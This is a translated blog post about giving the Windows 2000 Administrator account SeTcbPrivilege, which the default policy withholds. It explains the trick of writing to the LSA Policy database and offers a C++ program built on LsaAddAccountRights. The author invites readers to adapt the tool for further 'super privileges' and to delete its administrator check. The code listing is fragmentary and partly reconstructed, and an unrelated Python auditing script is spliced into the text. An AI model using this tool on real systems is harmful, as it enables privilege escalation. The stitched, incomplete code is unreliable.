How to exceed the Administrator permissions given by Windows 2000! Admin's rights are big, but not the biggest

xiaoxiao2021-03-06  65

Among the NT security components there is one called the Local Security Authority Protected Subsystem (LSA). When we log on as Administrator, the system's default authorization gives Administrator 16 privileges. The detailed list is as follows:

    SeChangeNotifyPrivilege
    SeSecurityPrivilege
    SeBackupPrivilege
    SeRestorePrivilege
    SeSystemtimePrivilege
    SeShutdownPrivilege
    SeRemoteShutdownPrivilege
    SeTakeOwnershipPrivilege
    SeDebugPrivilege
    SeSystemEnvironmentPrivilege
    SeSystemProfilePrivilege
    SeProfileSingleProcessPrivilege
    SeIncreaseBasePriorityPrivilege
    SeLoadDriverPrivilege
    SeCreatePagefilePrivilege
    SeIncreaseQuotaPrivilege

Of these, SeChangeNotifyPrivilege is enabled; the others are only enabled after the token is adjusted. With this many privileges Admin is very powerful, and no other user has so many. Still, there are a couple of powerful privileges that Admin does not have: SeTcbPrivilege and SeCreateTokenPrivilege. SeTcbPrivilege means that the current user's operations count as the operating system's own operations, and SeCreateTokenPrivilege, even more nakedly, lets you create a token with whatever privileges you like. It is an unrivalled privilege. Anyone holding these two would have exaggerated rights in the NT world, so NT gives neither of them to any user. Those who crave rights, usually viruses and hackers, go looking for the highest permission, and because of NT's protection these two permissions cannot be obtained directly, so a detour is needed. Since there is no direct API that adds a privilege to a token, we have to adjust user rights through the LSA Policy database, because a user's privileges are taken out of the LSA Policy: once a privilege has been added to the LSA Policy database, the user can enable that privilege in the next process. Hehe... the Administrators group has write access to the LSA Policy database. :DDD Admin has no super privilege, yet LSA takes the user's privileges out of a database that Admin can write... it's a cute little loop.
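The defender-side counterpart of what is described above, as an added example that is not code from the original post: the user rights that LsaAddAccountRights writes into the LSA Policy are what `secedit /export /cfg <file>` dumps under [Privilege Rights], so checking that export for holders of SeTcbPrivilege and SeCreateTokenPrivilege (which, as noted above, no account holds by default) catches this kind of assignment. The sample export, its domain SID and the "admins only" rule are constructed assumptions for the example.

```python
"""Added example (not the post's code): audit the LSA rights assignments the post's trick
writes to, via the [Privilege Rights] section of a `secedit /export /cfg <file>` export.
Rules (assumed; adapt to site policy): nobody holds SeTcbPrivilege or SeCreateTokenPrivilege,
and the other listed rights belong only to BUILTIN\\Administrators (S-1-5-32-544)."""
import sys
from typing import Dict, List

NOBODY_SHOULD_HOLD = ("SeTcbPrivilege", "SeCreateTokenPrivilege")
ADMINS_ONLY = ("SeDebugPrivilege", "SeLoadDriverPrivilege", "SeRestorePrivilege")
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
# Constructed sample in secedit's export format; the S-1-5-21-... domain SID is made up.
SAMPLE_EXPORT = """[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545
SeTcbPrivilege = *S-1-5-21-1111111111-2222222222-3333333333-500
SeCreateTokenPrivilege =
SeDebugPrivilege = *S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-555
[Version]
"""

def parse_privilege_rights(text: str) -> Dict[str, List[str]]:
    """Map right name -> principals; secedit writes SIDs with a leading '*', names without."""
    rights: Dict[str, List[str]] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):      # section header
            in_section = line.lower() == "[privilege rights]"
        elif in_section and "=" in line:                      # Right = p1,p2,...
            name, _, value = line.partition("=")
            rights[name.strip()] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights

def find_risky_assignments(rights: Dict[str, List[str]]) -> List[str]:
    """One finding per (right, principal) pair that breaks the two rules above."""
    findings = [f"{r} held by {who}" for r in NOBODY_SHOULD_HOLD for who in rights.get(r, [])]
    findings += [f"{r} held by {who}" for r in ADMINS_ONLY
                 for who in rights.get(r, []) if who != BUILTIN_ADMINISTRATORS]
    return findings

def audit_export(path: str) -> List[str]:
    """Audit a real export file; secedit writes it as UTF-16 with a BOM."""
    with open(path, encoding="utf-16") as fh:
        return find_risky_assignments(parse_privilege_rights(fh.read()))

if __name__ == "__main__":  # real export if a path is given, otherwise the built-in sample
    found = (audit_export(sys.argv[1]) if len(sys.argv) > 1
             else find_risky_assignments(parse_privilege_rights(SAMPLE_EXPORT)))
    print("\n".join(found) or "no risky rights assignments found")
```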
:) Below is the program I wrote; it opens up SeTcbPrivilege for Administrator. Although I put an Administrator check in the program, with a small amount of rewriting you can get some super privileges in other ways too, so use your brain. Of course, you can also simply delete the administrator check. :) A compiled version is available for download as well.

// sec.cpp
#define UNICODE
// The four header names were lost when the page was scraped; these are the ones this code needs.
#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#include <wchar.h>

//// global vars //
LSA_HANDLE PolicyHandle = 0;
PSID Sid = 0;
DWORD cbSid = 0;
LPTSTR ReferencedDomainName = 0;
DWORD cbReferencedDomainName = 0;
SID_NAME_USE peUse;
PUNICODE_STRING UserRights = 0;   // UNICODE_STRING pointer to the privilege name
ULONG Count = 0;
// WCHAR textSid[200];
HANDLE token = 0;
PTOKEN_PRIVILEGES TokenInformation = 0;
BOOL owned = 0;                   // set when SeTcbPrivilege is already in the token

//// quit //
void quit(int err)
{
    if (Sid) delete Sid;
    if (ReferencedDomainName) delete ReferencedDomainName;
    if (UserRights) delete UserRights;
    if (TokenInformation) delete TokenInformation;
    if (token) CloseHandle(token);
    if (PolicyHandle) LsaClose(PolicyHandle);
    wprintf(L"\n\nWritten by Lu Lin. 2000.1.30\nLicence: free.\n");
    if (err) { exit(0xc0000000); } else { exit(0); }
}

// Print one privilege from the token and remember whether it is SeTcbPrivilege.
void printprivilege(LUID_AND_ATTRIBUTES *luid)
{
    WCHAR DispName[100];
    ULONG cb = 100;
    if (!LookupPrivilegeName(0, &(luid->Luid), DispName, &cb)) {
        wprintf(L"I can't translate some LUID to privilege!\n");
        exit(1);
    }
    wprintf(L"\tPrivilege: %s\n", DispName);
    if (!_wcsicmp(DispName, L"SeTcbPrivilege")) owned = 1;
    switch (luid->Attributes) {
    case SE_PRIVILEGE_ENABLED_BY_DEFAULT:
        wprintf(L"\t\tThis privilege is enabled by default.\n"); break;
    case SE_PRIVILEGE_ENABLED:
        wprintf(L"\t\tThis privilege is enabled.\n"); break;
    case SE_PRIVILEGE_USED_FOR_ACCESS:
        wprintf(L"\t\tThis privilege is used for access.\n"); break;
    case 3:
        wprintf(L"\t\tThis privilege is always on for you.\n"); break;
    case 0:
        // The message for this case is cut off in the original listing ("This privilege you o...").
        break;
    }
}

// Environment check. The function header is missing from the original listing; the name is a placeholder.
void CheckEnvironment()
{
    WCHAR username[30];
    ULONG cb;
    OSVERSIONINFO osv;
    // if NT?
    ZeroMemory(&osv, sizeof(osv));
    osv.dwOSVersionInfoSize = sizeof(osv);
    GetVersionEx(&osv);
    // The original tested "!osv.dwPlatformId & VER_PLATFORM_WIN32_NT", which can never be true.
    if (osv.dwPlatformId != VER_PLATFORM_WIN32_NT) {
        wprintf(L"This program only runs on NT\n");
        quit(1);
    }
    // Check if this thread is executed inside Administrator's context.
    cb = 30;
    GetUserName(username, &cb);
    if (_wcsicmp(username, L"administrator")) {
        wprintf(L"Logon as administrator first!\n");
        quit(1);
    }
    wprintf(L"Windows NT %i.%i Build %i %s\n\n",
            osv.dwMajorVersion, osv.dwMinorVersion, osv.dwBuildNumber, osv.szCSDVersion);
}

// Convert a binary SID to its textual S-1-... form (Microsoft's sample routine).
BOOL GetTextualSid(PSID pSid,            // binary SID
                   LPTSTR TextualSid,    // buffer for textual representation of SID
                   DWORD dwBufferLen)    // required/provided TextualSid buffer size
{
    PSID_IDENTIFIER_AUTHORITY psia;
    DWORD dwSubAuthorities;
    DWORD dwSidRev = SID_REVISION;
    DWORD dwCounter;
    DWORD dwSidSize;

    // Validate the binary SID.
    if (!IsValidSid(pSid)) return FALSE;
    // Get the identifier authority value from the SID.
    psia = GetSidIdentifierAuthority(pSid);
    // Get the number of subauthorities in the SID.
    dwSubAuthorities = *GetSidSubAuthorityCount(pSid);
    // Compute the buffer length.
    // S-SID_REVISION- + IdentifierAuthority- + subauthorities- + NULL
    dwSidSize = (15 + 12 + (12 * dwSubAuthorities) + 1) * sizeof(TCHAR);
    // Check input buffer length.
    // If too small, indicate the proper size and set last error.
    // (The scrape dropped everything between this "<" and the next ">"; the statements up to
    // the identifier-authority test are restored from the comments and the Microsoft sample.)
    if (dwBufferLen < dwSidSize) {
        SetLastError(ERROR_INSUFFICIENT_BUFFER);
        return FALSE;
    }
    // Add 'S' prefix and revision number to the string.
    dwSidSize = wsprintf(TextualSid, TEXT("S-%lu-"), dwSidRev);
    // Add SID identifier authority to the string.
    if ((psia->Value[0] != 0) || (psia->Value[1] != 0)) {
        dwSidSize += wsprintf(TextualSid + lstrlen(TextualSid),
                              TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
                              (USHORT)psia->Value[0], (USHORT)psia->Value[1],
                              (USHORT)psia->Value[2], (USHORT)psia->Value[3],
                              (USHORT)psia->Value[4], (USHORT)psia->Value[5]);
    } else {
        dwSidSize += wsprintf(TextualSid + lstrlen(TextualSid), TEXT("%lu"),
                              (ULONG)(psia->Value[5]) + (ULONG)(psia->Value[4] << 8) +
                              (ULONG)(psia->Value[3] << 16) + (ULONG)(psia->Value[2] << 24));
    }
    // Add SID subauthorities to the string.
    // (The loop body and the return were lost the same way and are restored from the same sample.)
    for (dwCounter = 0; dwCounter < dwSubAuthorities; dwCounter++) {
        dwSidSize += wsprintf(TextualSid + dwSidSize, TEXT("-%lu"),
                              *GetSidSubAuthority(pSid, dwCounter));
    }
    return TRUE;
}

int main()
{
    // The start of main() was lost in the scrape (everything up to "TokenInformation->" below).
    // Judging by the globals, it opened the LSA policy into PolicyHandle, looked up the
    // Administrator SID into Sid and read the process token's privileges into TokenInformation;
    // those steps are not reconstructed here.
    LUID_AND_ATTRIBUTES *luid = TokenInformation->Privileges;
    wprintf(L"\nTotal privilege count: %i\n\n", TokenInformation->PrivilegeCount);
    for (Count = 0; Count < TokenInformation->PrivilegeCount; Count++, luid++) {
        printprivilege(luid);
    }

    //// Add SeTcbPrivilege to Administrator if not owned yet //
    if (!owned) {
        UserRights = new LSA_UNICODE_STRING;
        UserRights->Buffer = L"SeTcbPrivilege";
        UserRights->MaximumLength = 28;   // 14 wide characters, counted in bytes
        UserRights->Length = 28;
        if (LsaAddAccountRights(PolicyHandle, Sid, UserRights, 1)) {
            wprintf(L"Damn! Add right failed! :(\n");
            quit(1);
        } else {
            wprintf(L"\nAdd SeTcbPrivilege successfully!\n");
        }
        quit(0);
    } else {
        wprintf(L"\nYou own SeTcbPrivilege. I don't add it for you.\n");
    }
    return 0;
}

Author Blog:

http://blog.9cbs.net/ small stars /

Please credit the original URL when reposting: https://www.9cbs.com/read-89228.html
